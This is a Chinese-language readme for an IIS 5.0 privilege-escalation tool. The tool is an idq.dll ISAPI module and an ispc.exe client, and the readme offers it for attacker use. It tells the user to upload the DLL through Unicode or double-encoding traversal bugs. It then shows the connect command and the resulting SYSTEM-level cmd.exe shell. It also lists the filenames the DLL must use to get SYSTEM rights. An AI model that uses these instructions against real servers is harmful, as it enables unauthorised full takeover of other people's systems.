readme.txt

利用unicode漏洞修改管理员密码

IIS权限提升工具 by isno

包含程序：
idq.dll：提升权限的ISAPI程序
ispc.exe：客户端连接程序

简要说明：
本软件利用了IIS5.0+SP0（SP1、SP2）的权限检查漏洞来获得系统SYSTEM权限，
只要能把idq.dll上传至IIS的一个可执行目录中，就可以获得SYSTEM权限。

使用方法：
首先利用UNICODE、二次编码等漏洞将idq.dll上传至IIS的一个可执行目录中，
例如/scripts，然后使用ispc.exe进行连接：
C:\>ispc 127.0.0.1/scripts/idq.dll

Start to connect to the server...
We Got It!
Please Press Some <Return> to Enter Shell....



Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

C:\WINNT\system32>

这样获得的cmd.exe shell是SYSTEM权限的。

注意：
1、idq.dll上传到IIS可执行目录中后必须命名为以下名字之一：
     1、 idq.dll
     2、 httpext.dll
     3、 httpodbc.dll
     4、 ssinc.dll
     5、 msw3prt.dll
     6、 author.dll
     7、 admin.dll
     8、 shtml.dll
     9、 sspifilt.dll
     10、compfilt.dll
     11、pwsdata.dll
     12、md5filt.dll
     13、fpexedll.dll
如使用其他名字，则无法获得SYSTEM权限。
2、输入完一个命令后要按三次回车，才能回显。
3、SP3不受此漏洞影响。